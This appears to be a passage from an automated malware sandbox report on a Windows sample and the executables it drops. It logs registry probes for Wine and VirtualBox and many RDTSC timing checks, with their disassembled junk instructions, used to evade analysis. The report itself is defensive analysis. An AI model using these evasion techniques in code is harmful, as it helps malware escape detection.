                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F8C1 second address: A4F8C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F8C6 second address: A4F8CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB8A44 second address: BB8A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F0F34BEC159h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC96DF second address: BC9701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0F345319E6h 0x0000000a pop ebx 0x0000000b pop esi 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9701 second address: BC9705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC997B second address: BC9981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9981 second address: BC9985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9985 second address: BC99A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F0F345319F9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9AE3 second address: BC9AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9AE9 second address: BC9AEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9D54 second address: BC9D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9D5F second address: BC9D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9D65 second address: BC9D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9E95 second address: BC9ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F9h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jng 00007F0F345319EAh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0F345319F4h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9ED8 second address: BC9EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC159h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCF8D second address: BCCF92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCF92 second address: BCCFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F0F34BEC14Bh 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCFAF second address: BCCFBC instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCCFF7 second address: BCCFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD174 second address: BCD198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0F345319EBh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD198 second address: BCD209 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 6603B300h 0x0000000e mov edx, dword ptr [ebp+122D1CE1h] 0x00000014 jmp 00007F0F34BEC14Fh 0x00000019 push 00000003h 0x0000001b mov ecx, dword ptr [ebp+122D3DDCh] 0x00000021 push 00000000h 0x00000023 and edx, 72EB46EEh 0x00000029 push 00000003h 0x0000002b jmp 00007F0F34BEC157h 0x00000030 push 6887205Fh 0x00000035 js 00007F0F34BEC16Eh 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F0F34BEC158h 0x00000042 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD209 second address: BCD27C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 5778DFA1h 0x00000010 push ebx 0x00000011 mov ecx, dword ptr [ebp+122D3E44h] 0x00000017 pop edi 0x00000018 push eax 0x00000019 mov edx, dword ptr [ebp+122D3DACh] 0x0000001f pop ecx 0x00000020 lea ebx, dword ptr [ebp+12451E5Fh] 0x00000026 jmp 00007F0F345319F2h 0x0000002b mov esi, dword ptr [ebp+122D39CCh] 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F0F345319F9h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b js 00007F0F345319E6h 0x00000041 jmp 00007F0F345319EBh 0x00000046 popad 0x00000047 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD27C second address: BCD286 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC14Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD35F second address: BCD3BC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F0F345319E8h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 sub dword ptr [ebp+122D1CDCh], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F0F345319E8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 00000017h 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 xor dword ptr [ebp+122D263Dh], eax 0x0000004a push 5D5FCE2Fh 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD3BC second address: BCD3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCD3C0 second address: BCD3C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED3D3 second address: BED419 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F0F34BEC157h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F0F34BEC148h 0x00000017 js 00007F0F34BEC14Ch 0x0000001d je 00007F0F34BEC146h 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB304 second address: BEB32C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319EFh 0x00000009 popad 0x0000000a push ecx 0x0000000b jmp 00007F0F345319ECh 0x00000010 jbe 00007F0F345319E6h 0x00000016 pop ecx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB479 second address: BEB47E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB47E second address: BEB48C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F345319E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD51 second address: BEBD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0F34BEC146h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0F34BEC151h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD6F second address: BEBD75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD75 second address: BEBD7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD7B second address: BEBD80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD80 second address: BEBD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBD86 second address: BEBD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0F345319EAh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC193 second address: BEC19D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5457 second address: BB5467 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0F345319EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA41 second address: BECA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA47 second address: BECA60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F5h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA60 second address: BECA64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA64 second address: BECA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA78 second address: BECA7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA7C second address: BECA84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECA84 second address: BECAA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F34BEC154h 0x00000007 pushad 0x00000008 jmp 00007F0F34BEC14Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECAA8 second address: BECAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECC1B second address: BECC2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC14Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECF68 second address: BECF6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BECF6C second address: BECF73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED24C second address: BED250 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED250 second address: BED258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BED258 second address: BED281 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F0F345319EEh 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0F345319F1h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE87F second address: BEE885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE885 second address: BEE889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE889 second address: BEE88D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEE88D second address: BEE8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F345319E8h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF175E second address: BF1762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF1762 second address: BF1766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF811A second address: BF8124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0F34BEC146h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8124 second address: BF812A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF812A second address: BF8130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8130 second address: BF8137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7842 second address: BF7857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC150h 0x00000009 pop ecx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF79CA second address: BF79D4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0F345319E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7CAA second address: BF7CCB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F34BEC163h 0x00000008 jmp 00007F0F34BEC157h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF7F99 second address: BF7FB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F345319F6h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFABC6 second address: BFABD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F34BEC146h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFABD1 second address: BFABE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007F0F345319ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB0B2 second address: BFB0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB19C second address: BFB1A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0F345319E6h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB671 second address: BFB676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC07C second address: BFC080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFC080 second address: BFC0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov esi, dword ptr [ebp+122D3F5Ch] 0x00000010 push 00000000h 0x00000012 xor si, E10Bh 0x00000017 push 00000000h 0x00000019 adc di, 30A6h 0x0000001e xchg eax, ebx 0x0000001f push eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD9EA second address: BFDA6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F345319F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F0F345319E8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D1D02h], edx 0x0000002d push 00000000h 0x0000002f cmc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 call 00007F0F345319E8h 0x0000003a pop eax 0x0000003b mov dword ptr [esp+04h], eax 0x0000003f add dword ptr [esp+04h], 00000014h 0x00000047 inc eax 0x00000048 push eax 0x00000049 ret 0x0000004a pop eax 0x0000004b ret 0x0000004c mov esi, dword ptr [ebp+122DBC8Bh] 0x00000052 xchg eax, ebx 0x00000053 push eax 0x00000054 push edx 0x00000055 push edx 0x00000056 jmp 00007F0F345319F2h 0x0000005b pop edx 0x0000005c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD1E9 second address: BFD1EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD1EF second address: BFD1F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFE503 second address: BFE51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F34BEC153h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFD1F4 second address: BFD1FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFEE52 second address: BFEEDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0F34BEC151h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 sbb esi, 15047600h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F0F34BEC148h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 pushad 0x00000033 mov eax, ebx 0x00000035 pushad 0x00000036 mov dh, bh 0x00000038 or cl, FFFFFFFAh 0x0000003b popad 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F0F34BEC148h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov dword ptr [ebp+122D22A9h], ecx 0x0000005f xchg eax, ebx 0x00000060 js 00007F0F34BEC154h 0x00000066 pushad 0x00000067 je 00007F0F34BEC146h 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0029D second address: C002A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C00CEB second address: C00D16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0F34BEC154h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e js 00007F0F34BEC158h 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F0F34BEC146h 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C00D16 second address: C00D76 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F345319E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jp 00007F0F345319EEh 0x00000011 pushad 0x00000012 or dword ptr [ebp+122D1F4Eh], edi 0x00000018 sbb ch, 00000007h 0x0000001b popad 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F0F345319E8h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 push esi 0x00000039 sbb si, 1841h 0x0000003e pop edi 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+1247974Eh], edi 0x00000047 xchg eax, ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a push esi 0x0000004b pop esi 0x0000004c jnc 00007F0F345319E6h 0x00000052 